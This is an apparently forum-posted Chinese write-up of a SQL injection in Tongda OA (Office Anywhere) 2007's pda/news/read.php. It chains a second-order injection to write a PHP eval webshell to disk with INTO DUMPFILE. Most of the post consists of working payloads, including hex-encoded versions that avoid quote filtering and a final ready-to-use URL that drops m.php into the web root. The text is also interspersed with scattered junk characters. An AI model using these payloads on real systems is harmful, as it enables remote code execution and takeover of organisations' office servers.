通达OA2007版本漏洞及getshell

admin

目前测试通达OA2007版本


1 N3 e" s9 b( NOffice Anywhere 2007 网络智能办公系统
; ]6 k1 P. h  N3 q8 M: ?/ z
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
+ J$ c  `7 L* @. s9 I6 f
& U% C0 \2 A2 M& ~
这个时候看了下代码，存在注入的那个变量的语句中第3个字段，在该文件下面被另外个select语句调用了，灵光一闪，大概思路是这样的

例如：SELECT * from USER where USER_ID='{$USERNAME}'  
2 l+ H; p6 }4 H其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了

, E$ t  n( P  I( M: a这个时候我们是不是可以组合起来使用哪？

第一条语句开始注入，union select 1,2,3,4,5,6,7,8,9,10...，比如第3个是PROVIDER字段，我们这样
9 D$ z* s6 i* F# \3 Y1 j, tunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10

, O! N: |( o8 I这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了

那么问题来了，单引号可以吗？当然是不可以的，^_^。。。

) F7 v% V! k; ]' T, j5 J: t0 F3 O3 g那么我们用字符串格式带入进行hex编码

%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23

测试ok，获取oa的webshell


pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
直接getwebshell